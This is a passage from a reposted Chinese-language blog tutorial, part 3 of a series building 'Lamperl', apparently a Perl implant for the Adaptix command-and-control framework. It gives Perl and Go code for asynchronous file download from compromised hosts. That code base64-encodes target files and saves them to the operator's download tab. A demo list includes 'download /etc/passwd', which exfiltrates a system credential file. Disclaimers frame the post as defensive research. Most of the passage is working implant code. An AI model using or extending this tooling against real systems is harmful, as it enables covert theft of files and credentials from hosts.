file_id=>$task_id,
size=>length($content),
content=>&nbsp;encode_base64($content,&nbsp;''),
&nbsp; &nbsp; };
}

my$cmd_download&nbsp;= make_async(\&cmd_download_sync,&nbsp;'download');

empty_response这个 closure 为错误情况提供了一致的返回结构。整体流程是:把文件读入内存,base64 编码后返回。

Adaptix 配置 – Download

ax_config.axs (Download 配置)

letcmd_download=ax.create_command("download",&nbsp;"Download files",&nbsp;"download /path/file.txt",&nbsp;"Task: download");
cmd_download.addArgString("file",&nbsp;true);

pl_agent.go – CreateTask (任务创建)

CreateTask中 download 的分支很简单:只需验证用户提供了目标文件路径。

case"download":
taskData.Type=&nbsp;TYPE_JOB

path,&nbsp;ok:=&nbsp;args["file"].(string)
if!ok {
err=&nbsp;errors.New("parameter 'file' must be set")
return&nbsp;taskData, messageData, err
&nbsp; &nbsp; }
&nbsp; &nbsp; commandData["path"]&nbsp;=&nbsp;path

pl_agent.go – ProcessTasksResult (任务结果处理)

这里会在 download 开始时先显示一条消息;完成后再把 base64 解码并保存,使其能在 downloads tab 中被访问。

case"download":
task.Type=&nbsp;TYPE_JOB

// Check if this is async job start
asyncVal:=getInt(outputData,&nbsp;"async")
if&nbsp;asyncVal&nbsp;!=0&nbsp;{
jobId:=getString(outputData,&nbsp;"job_id")
pid:=getInt(outputData,&nbsp;"pid")
path:=getString(outputData,&nbsp;"path")
task.Completed=false
task.Message=&nbsp;fmt.Sprintf("Downloading:&nbsp;%s", path)
task.ClearText=&nbsp;fmt.Sprintf("Job&nbsp;%s&nbsp;(PID:&nbsp;%d) started in background", jobId, pid)
&nbsp; &nbsp; }&nbsp;elseiferrMsg:=getString(outputData,&nbsp;"error"); errMsg&nbsp;!=""&nbsp;{
task.Message=&nbsp;fmt.Sprintf("Download error:&nbsp;%s", errMsg)
task.MessageType=&nbsp;MESSAGE_ERROR
&nbsp; &nbsp; }&nbsp;else&nbsp;{
// Completion report from finished job
path:=getString(outputData,&nbsp;"path")
fileId:=getString(outputData,&nbsp;"file_id")
sizeFloat,&nbsp;_:=&nbsp;outputData["size"].(float64)
size:=int(sizeFloat)
contentB64:=getString(outputData,&nbsp;"content")

if&nbsp;contentB64&nbsp;==""||&nbsp;size&nbsp;==0&nbsp;{
task.Message=&nbsp;fmt.Sprintf("Download failed:&nbsp;%s&nbsp;(file not found or empty)", path)
task.MessageType=&nbsp;MESSAGE_ERROR
&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{
// Decode base64 content
fileContent,&nbsp;err:=&nbsp;base64.StdEncoding.DecodeString(contentB64)
if&nbsp;err&nbsp;!=nil&nbsp;{
task.Message=&nbsp;fmt.Sprintf("Error decoding downloaded file&nbsp;%s:&nbsp;%s", path, err.Error())
task.MessageType=&nbsp;MESSAGE_ERROR
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{
// Extract filename from path
fileName:=&nbsp;path
ifidx:=&nbsp;strings.LastIndex(path,&nbsp;"/"); idx&nbsp;!=-1&nbsp;{
fileName=&nbsp;path[idx+1:]
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }

// Save file using C2 bindings
err:=&nbsp;ts.TsDownloadSave(agentData.Id, fileId, fileName, fileContent)
if&nbsp;err&nbsp;!=nil&nbsp;{
task.Message=&nbsp;fmt.Sprintf("Error saving downloaded file&nbsp;%s:&nbsp;%s", path, err.Error())
task.MessageType=&nbsp;MESSAGE_ERROR
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{
task.Message=&nbsp;fmt.Sprintf("Download completed:&nbsp;%s", fileName)
task.MessageType=&nbsp;MESSAGE_SUCCESS
task.ClearText=&nbsp;fmt.Sprintf("Size:&nbsp;%d&nbsp;bytes\nFile ID:&nbsp;%s", size, fileId)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }

关键调用是 ts.TsDownloadSave():它把文件存入 Adaptix 的 download tab,供操作员在 UI 中下载。

测试 / 演示

run /Tools/nmap

jobs list

jobs get <id>

jobs kill <id>

download /etc/passwd

upload /etc/passwd passtest

结论

我们实现了一套 job 控制系统,具备:

  • 通过可复用的高阶 wrapper 实现异步执行
  • 使用 pipe 与 fcntl 实现非阻塞 I/O
  • 与 beacon loop 集成的自动完成上报
  • 支持 list/get/kill 的 job 管理
  • 文件传输(upload/download)
  • 通过 Task Manager 右键菜单完成 UI 集成

make_async模式非常强大:它能用极少的代码,把任意同步操作变成可后台运行的 job。

另一个重要改动是从 TsAgentConsoleOutput切换到 task.Message与 task.ClearText:除了向操作员展示输出外,还会把 task 与 job 的输出持久化到 server 侧。

希望这篇文章对你有帮助或启发。下一篇我们会处理网络 pivoting 能力:本地端口转发、远程端口转发,以及 SOCKS proxy 支持。

本次迭代的完整代码已发布在 GitHub:

  • Lamperl 第 3 篇 GitHub 仓库

Lamperl pt 3 (Uploads, Downloads, Job Control)

免责声明:本博客文章仅用于教育和研究目的。提供的所有技术和代码示例旨在帮助防御者理解攻击手法并提高安全态势。请勿使用此信息访问或干扰您不拥有或没有明确测试权限的系统。未经授权的使用可能违反法律和道德准则。作者对因应用所讨论概念而导致的任何误用或损害不承担任何责任。


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:securitainment Polar《Lamperl 第 3 篇:文件上传、下载与 Job 控制系统》

评论:0   参与:  0